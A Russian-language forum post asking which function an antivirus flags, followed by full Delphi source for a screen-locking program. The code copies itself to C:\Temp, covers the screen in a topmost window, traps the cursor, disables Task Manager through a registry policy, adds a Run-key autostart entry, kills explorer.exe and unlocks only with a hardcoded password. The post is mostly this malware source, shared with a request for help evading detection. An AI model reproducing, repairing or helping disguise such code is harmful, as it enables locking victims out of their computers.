помогите разобрать какую функцию палит антивирус

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, ExtCtrls, tlhelp32, StdCtrls, registry;

type
TForm1 = class(TForm)
Timer1: TTimer;
Label1: TLabel;
Label2: TLabel;
Edit1: TEdit;
Button1: TButton;
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
procedure FormMouseMove(Sender: TObject; Shift: TShiftState; X,
Y: Integer);
procedure FormShow(Sender: TObject);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
function KillTask(ExeFileName: string): Integer;
var
Form1: TForm1;
my:integer;
implementation

{$R *.dfm}

procedure TForm1.Timer1Timer(Sender: TObject);
var
curs: TRect;
begin
SetWindowPos(Handle,HWND_TOPMOST,Left,Top,Width,Height,SWP_NOACTIVATE Or SWP_NOMOVE Or SWP_NOSIZE);
curs := Rect(Form1.Left+20, Form1.Top+20, Form1.Left + Form1.Width-30, Form1.Top + Form1.Height-30);
ClipCursor(@curs);
//KillTask('taskmgr.exe');
//KillTask('regedit.exe');
//KillTask('explorer.exe');
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
CopyFile(PChar(ParamStr(0)), PChar('C:\Temp\' +
ExtractFileName(ParamStr(0))), True);
left:=0;
top:=0;
height:=screen.Height;
width:=screen.Width;
my:=0;
end;

function KillTask(ExeFileName: string): Integer;
const
PROCESS_TERMINATE = $0001;
var
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
begin
Result := 0;
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := SizeOf(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);

while Integer(ContinueLoop) <> 0 do
begin
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) =
UpperCase(ExeFileName))) then
Result := Integer(TerminateProcess(
OpenProcess(PROCESS_TERMINATE,
BOOL(0),
FProcessEntry32.th32ProcessID),
0));
ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
procedure TForm1.FormMouseMove(Sender: TObject; Shift: TShiftState; X,
Y: Integer);
begin
Label2.Caption:='x='+inttostr(x)+'-y='+inttostr(y);
end;

procedure TForm1.FormShow(Sender: TObject);
var
r,r1:TRegistry;
begin
r:=Tregistry.Create;
r.RootKey:=HKEY_CURRENT_USER;
r.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\System',true);
r.WriteBool('disabletaskmgr',true);
r.CloseKey;
r.Free;
r1:=Tregistry.Create;
r1.RootKey:=HKEY_CURRENT_USER;
r1.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',true);
r.WriteString('dogIE','C:\Temp\iexplorer.exe');
WinExec('TaskKill /F /IM explorer* /T', SW_HIDE);
end;

procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
var reg,reg1:tregistry;
begin
if my=1 then begin
reg:=tregistry.Create;
reg.RootKey:=HKEY_CURRENT_USER;
if reg.KeyExists('Software\Microsoft\Windows\CurrentVersion\Policies\System')=true then
reg.DeleteKey('Software\Microsoft\Windows\CurrentVersion\Policies\System');
reg.Free;
reg1:=tregistry.Create;
reg1.RootKey:=HKEY_CURRENT_USER;
if reg1.KeyExists('Software\Microsoft\Windows\CurrentVersion\Run')=true then begin
reg1.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',True);
reg1.DeleteValue('dogIE');
reg1.CloseKey();
end;
reg1.Free;
FindExplorer();
end
else
Application.Run;
end;

procedure TForm1.Button1Click(Sender: TObject);
begin
if Edit1.Text='tolorof9e1' then
my:=1
else
my:=0;
Close;
end;

end.